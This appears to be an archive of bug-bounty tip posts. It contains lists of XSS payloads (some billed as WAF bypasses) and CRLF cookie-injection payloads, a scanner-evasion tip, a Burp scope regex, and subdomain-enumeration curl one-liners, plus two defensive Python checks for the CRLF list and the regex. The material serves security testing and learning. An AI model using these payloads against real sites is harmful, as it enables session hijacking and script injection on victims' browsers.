Bug bounty Tips

🛡️ Cybersecurity enthusiast | 💻 Helping secure the digital world | 🌐 Web App Tester | 🕵️‍♂️ OSINT Specialist Admin: @laazy_hack3r

Post archive
I have shared a video on Instagram about which operating system is better, so do check it out guys https://www.instagram.com/reel/C9ww22ry8Ub/?igsh=MzRlODBiNWFlZA==

🚀 Apepe - Mobile application pentesting🚀
🕵️ Apepe is a Python tool developed to help pentesters and red teamers to easily get information from the target app. This tool will extract basic information such as the package name, if the app is signed and the development language...
🧾 Source - github.com/oppsec/Apepe

🔖10 Juicy XSS payloads that you can use.

1️⃣. ?msg=%3Csvg%2Fonload%3Dalert%28%22XSS%22%29%20%3E, <svg/onload=alert("XSS") >
hackerone.com/reports/2433634

2️⃣. ?utm_source=abc%60%3breturn+false%7d%29%3b%7d%29%3balert%60xss%60;%3c%2f%73%63%72%69%70%74%3e
hackerone.com/reports/846338
The payload finished open function calls from jQuery, executes an alert as POC and then finished the original script tag

3️⃣. <a+HREF="%26%237 javascrip%26%239t: alert%261par;document .domain) *>
WAF / Cloudflare Bypass

4️⃣. ”/>&_lt;_script>alert(1)&_lt;/scr_ipt>”/>
remove the underscores
hackerone.com/reports/484434
filtering using HTML entities for the alternation of <>, because I noticed that it's filtering the

5️⃣. <a href=[ ]" onmouseover=prompt(1)//">XYZ</a>

6️⃣. <script /*/>/*/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/*/</script /*/

7️⃣. <blink/ onmouseover=prompt(1)>OnMouseOver
Firefox & Opera

8️⃣. <svg> <foreignObject width="100%" height="100%"> <body> <iframe src='javascript:confirm(10)'></iframe> </body> </foreignObject> </svg>

9️⃣. <script>var a=document.createElement("a");a.href="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==";a.click();</script>

1️⃣🅾️. jaVasCript:/--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[/[]/+alert(1)//'>"'alert(1)

🐱 github
💡You can check the group for more resources
#XSS #BugBounty #BugBountyTips
🔸🔸 Share & Support Us 🔸 🔸
✔️ Channel: @bugbounty_tech
👥 Group: @bugbounty_talks

Guys any update on the last VDP program??

You know guys, today it's going to be 1 year since starting this channel. I didn't expect that I would reach this far, and that too near 1k followers; I would like to thank one and all. At first I was losing hope that this was going to happen, but today I realised that a long-term goal can keep you happy and being more consistent can do a lot of wonders. Thanks everyone, and I will work hard on giving you guys more and better BugBounty tips.
And I have taken on a challenge that cipherops should be a part of the reason that everyone gets their first bounty happily.

📮JScripter - A noob-friendly JavaScript scraper based on #GAU and #hakrawler. Options to scan a single URL or multiple URLs from a list. Uses threads, saves files into a directory, and de-duplicates during saving. ✅Download- https://github.com/ifconfig-me/JScripter #BugBounty #bugbountytips

How to fix the Crowdstrike thing:
1. Boot Windows into safe mode
2. Go to C:\Windows\System32\drivers\CrowdStrike
3. Delete C-00000291*.sys
4. Repeat for every host in your enterprise network including remote workers
5. If you're using BitLocker jump off a bridge

Bug Bounty Tip CRLF Injection Attack Payload List 🔹 /%%0a0aSet-Cookie:crlf 🔹 /%0aSet-Cookie:crlf 🔹 /%0d%0aSet-Cookie:crlf 🔹 /%0dSet-Cookie:crlf 🔹 /%23%0aSet-Cookie:crlf 🔹 /%23%0d%0aSet-Cookie:crlf 🔹 /%23%0dSet-Cookie:crlf 🔹 /%25%30%61Set-Cookie:crlf 🔹 /%25%30aSet-Cookie:crlf 🔹 /%250aSet-Cookie:crlf 🔹 /%25250aSet-Cookie:crlf 🔹 /%2e%2e%2f%0d%0aSet-Cookie:crlf 🔹 /%2f%2e%2e%0d%0aSet-Cookie:crlf 🔹 /%2F..%0d%0aSet-Cookie:crlf 🔹 /%3f%0d%0aSet-Cookie:crlf 🔹 /%3f%0dSet-Cookie:crlf 🔹 /%u000aSet-Cookie:crlf 🔹 /%E5%98%8D%E5%98%8ASet-Cookie:crlf #bugbounty #cybersecurity #ethicalhacking
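A defender-side check for the encodings in the list above, as an added example that is not part of the original post: it decodes request paths from access-log lines through nested percent-encoding, %uXXXX escapes and wide characters whose low byte is CR or LF. The log format, function names and round limit are assumptions, and the log lines are constructed.

```python
import re
from urllib.parse import unquote

PCT_U = re.compile(r"%u([0-9a-fA-F]{4})")        # IIS-style %uXXXX escapes
HEADER_AFTER_EOL = re.compile(r"[\r\n][A-Za-z-]+:")
REQUEST = re.compile(r'"[A-Z]+ (\S+) HTTP/[\d.]+"')
MAX_ROUNDS = 4                                    # bound for nested encodings

def decode_once(s):
    s = PCT_U.sub(lambda m: chr(int(m.group(1), 16)), s)
    return unquote(s, errors="replace")

def crlf_finding(path):
    """Return a reason string if the path can decode to CR/LF, else None."""
    cur = path
    for rounds in range(1, MAX_ROUNDS + 1):
        nxt = decode_once(cur)
        if "\r" in nxt or "\n" in nxt:
            return f"CR/LF after {rounds} decode round(s)"
        # Heuristic: U+560D / U+560A turn into 0x0D / 0x0A when a later
        # component keeps only the low byte of each character.
        folded = "".join(chr(ord(c) & 0xFF) if ord(c) > 0xFF else c for c in nxt)
        if HEADER_AFTER_EOL.search(folded):
            return "wide character folds to CR/LF before a header name"
        if nxt == cur:                            # fully decoded, nothing found
            return None
        cur = nxt
    return None

def scan(log_lines):
    """Return (path, reason) for every request line that carries a finding."""
    hits = []
    for line in log_lines:
        m = REQUEST.search(line)
        reason = crlf_finding(m.group(1)) if m else None
        if reason:
            hits.append((m.group(1), reason))
    return hits

# Constructed access-log lines; the flagged paths reuse entries from the list.
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Jan/2024:10:00:00 +0000] "GET /products?page=2 HTTP/1.1" 200',
    '203.0.113.5 - - [01/Jan/2024:10:00:01 +0000] "GET /%0d%0aSet-Cookie:crlf HTTP/1.1" 302',
    '203.0.113.5 - - [01/Jan/2024:10:00:02 +0000] "GET /%25250aSet-Cookie:crlf HTTP/1.1" 302',
    '203.0.113.5 - - [01/Jan/2024:10:00:03 +0000] "GET /%E5%98%8D%E5%98%8ASet-Cookie:crlf HTTP/1.1" 302',
    '203.0.113.5 - - [01/Jan/2024:10:00:04 +0000] "GET /search?q=100%25 HTTP/1.1" 200',
    '203.0.113.5 - - [01/Jan/2024:10:00:05 +0000] "GET /%u000aSet-Cookie:crlf HTTP/1.1" 302',
]
```

The wide-character rule only fires when a header-like token follows the folded byte, which keeps ordinary non-Latin paths from being flagged.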

Just discovered https://web-check.xyz and recommend that you do too! It's an ALL-IN-ONE OSINT tool for analysing websites. You give it a URL and it gives you: Server Location and IP info, SSL Certificate, Domain Whois, Server info, Cookies, Headers, DNS Records, HTTP Security, Social Tags, Security.txt, DNS Server, Firewall, DNS Security, HSTS Check, Threats, TLS Cipher Suites, TLS Security Issues, TLS Handshake Simulation, Redirects, Linked Pages, Crawl Rules, Server Status, Open ports, Text records, Carbon footprint

😱 Wow all the best guys.

Leave 20 reactions ☝️

Hello guys, good evening. This week's VDP program is here; check this website, try it out, and do update us and let us know how the BugBounty is going: https://www.humanprotocol.org/vulnerability-disclosure-policy

Web Hacking Tip: - jhaddix When using ffuf change the user agent string as the default one "Fuzz Faster U Fool" is commonly blocked. -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"

📌Targeted Scanning with Burp Suite: A Regex Pattern for example.com

❓As a penetration tester or bug bounty hunter, it's essential to focus your scanning efforts on the specific domains and subdomains that matter. In this post, we'll explore a regex pattern that helps you target the example.com domain and its subdomains in Burp Suite, and how to combine it with powerful tools to get more fine-grained results.

💵The Regex Pattern: (^|^[^:]+:\/\/|[^\.]+\.)example.*

🛍Let's break down this pattern:
- (^|^[^:]+:\/\/): Matches the protocol and subdomain (if any) before the main domain example.
- ([^\.]+\.): Matches the subdomain (if any) before the main domain example.
- example: The main domain name, replaced with example in this example.
- .*: Matches any characters (including none) after the main domain name.

🛍This pattern will match any URLs that contain the domain example and may include:
- Protocols like http:// or https://
- Subdomains like sub.example or foo.bar.example
- Paths and query strings like /path/to/resource?param=value

❗️Using this Pattern in Burp Suite:
✔️Add this regex pattern to the "Add Scope" section in Burp Suite to specify the scope of URLs that Burp should target. This will help Burp focus on the specific domain and its subdomains, and ignore other unrelated URLs.

❗️Combining with Powerful Tools:
✔️To get more fine-grained results, combine this regex pattern with the following tools in Burp Suite:
1. Burp JS Link Finder: Finds JavaScript files and links on the target website.
2. Param Miner: Analyzes HTTP requests and responses to identify potential parameter manipulation vulnerabilities.
3. Logger++: Enhances the logging capabilities of Burp, making it easier to analyze and filter log data.
4. Turbo Intruder: Automates and accelerates the process of sending multiple requests to a target system.
5. SQLMap: Detects and exploits SQL injection vulnerabilities in the targeted scope.

⚡️By using this regex pattern and combining it with these powerful tools, you can perform a more targeted and efficient vulnerability scan on the example.com domain and its subdomains.
☄️Happy Hunting!☄️
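A scope check for the pattern in the post above, as an added example that is not part of the original post: it lists hosts the pattern accepts that are not example.com or one of its subdomains, so scope drift is visible before any scanning starts. The stricter pattern, the function names and the unanchored-search matching are assumptions, and the host list is constructed.

```python
import re

# Pattern exactly as given in the post.
POST_PATTERN = re.compile(r"(^|^[^:]+:\/\/|[^\.]+\.)example.*")

# Assumed stricter host pattern (not from the post): example.com and its
# subdomains only, anchored at both ends, with the dot before "com" escaped.
STRICT_HOST = re.compile(r"^(?:[a-z0-9-]+\.)*example\.com$", re.IGNORECASE)

def post_pattern_matches(value):
    # Assumption: the scope regex is applied as an unanchored search.
    return POST_PATTERN.search(value) is not None

def strict_host_matches(host):
    return STRICT_HOST.fullmatch(host) is not None

def scope_drift(hosts):
    """Hosts the post's pattern accepts but the strict pattern rejects."""
    return [h for h in hosts
            if post_pattern_matches(h) and not strict_host_matches(h)]

# Constructed sample hosts: the first three are intended scope, the rest
# belong to other parties.
SAMPLE_HOSTS = [
    "example.com",
    "api.example.com",
    "a.b.example.com",
    "example.org",
    "examplebank.net",
    "www.example-login.io",
    "example.com.evil.test",
    "notexample.com",
]

if __name__ == "__main__":
    for host in SAMPLE_HOSTS:
        print(f"{host:24} post={post_pattern_matches(host)!s:5} "
              f"strict={strict_host_matches(host)}")
    print("out-of-scope hosts accepted by the post's pattern:",
          scope_drift(SAMPLE_HOSTS))
```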

Directory-Traversal-Payloads

/****/: This is a directory traversal sequence, which is used to navigate through the file system. The **** is a common pattern used to traverse directories, allowing an attacker to access files outside of the web root.

𝗫𝗦𝗦 𝗕𝘆𝗽𝗮𝘀𝘀 𝗣𝗮𝘆𝗹𝗼𝗮𝗱: javascript​:var a="ale";var b="rt";var c="()";decodeURI("<button popovertarget=x>Click me</button><cybertix onbeforetoggle​="+a+b+c+" popover id=x>CYBERTIX</cybertix>") BY @cybertix

Subdomain finder one-liners find subdomains from various sources and add them to output.txt file. (will need a sort out)

# TARGET must be set to the apex domain before running these.
# The first command creates output.txt; the others append to it.
(curl -s "https://rapiddns.io/subdomain/$TARGET?full=1#result" 2>/dev/null | grep "<td><a" 2>/dev/null | cut -d '"' -f 2 2>/dev/null | grep http 2>/dev/null | cut -d '/' -f3 2>/dev/null | sed 's/#results//g' 2>/dev/null | sort -u 2>/dev/null) > output.txt
(curl -s "https://dns.bufferover.run/dns?q=.$TARGET" 2>/dev/null | jq -r '.FDNS_A[]' 2>/dev/null | cut -d',' -f2 2>/dev/null | sort -u 2>/dev/null) >> output.txt
(curl -s "https://riddler.io/search/exportcsv?q=pld:${TARGET}" 2>/dev/null | grep -Po "(([\w.-]*)\.([\w]*)\.([A-z]))\w+" 2>/dev/null | sort -u 2>/dev/null) >> output.txt
(curl -s "https://www.virustotal.com/ui/domains/${TARGET}/subdomains?limit=40" 2>/dev/null | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" 2>/dev/null | sort -u 2>/dev/null) >> output.txt
# Space added before 2>/dev/null so tr writes to the pipeline, not to /dev/null.
(curl -s "https://certspotter.com/api/v1/issuances?domain=${TARGET}&include_subdomains=true&expand=dns_names" 2>/dev/null | jq '.[].dns_names' 2>/dev/null | tr -d '[]"\n ' 2>/dev/null | tr ',' '\n' 2>/dev/null) >> output.txt
(curl -s "https://jldc.me/anubis/subdomains/${TARGET}" 2>/dev/null | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" 2>/dev/null | sort -u 2>/dev/null) >> output.txt
(curl -s "https://securitytrails.com/list/apex_domain/${TARGET}" 2>/dev/null | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" 2>/dev/null | grep "${TARGET}" 2>/dev/null | sort -u 2>/dev/null) >> output.txt
(curl --silent "https://sonar.omnisint.io/subdomains/$TARGET" 2>/dev/null | grep -oE "[a-zA-Z0-9._-]+\.$TARGET" 2>/dev/null | sort -u 2>/dev/null) >> output.txt
(curl --silent -X POST https://synapsint.com/report.php -d "name=https%3A%2F%2F$TARGET" 2>/dev/null | grep -oE "[a-zA-Z0-9._-]+\.$TARGET" 2>/dev/null | sort -u 2>/dev/null) >> output.txt
(curl -s "https://crt.sh/?q=%25.$TARGET&output=json" 2>/dev/null | jq -r '.[].name_value' 2>/dev/null | sed 's/\*\.//g' 2>/dev/null | sort -u 2>/dev/null) >> output.txt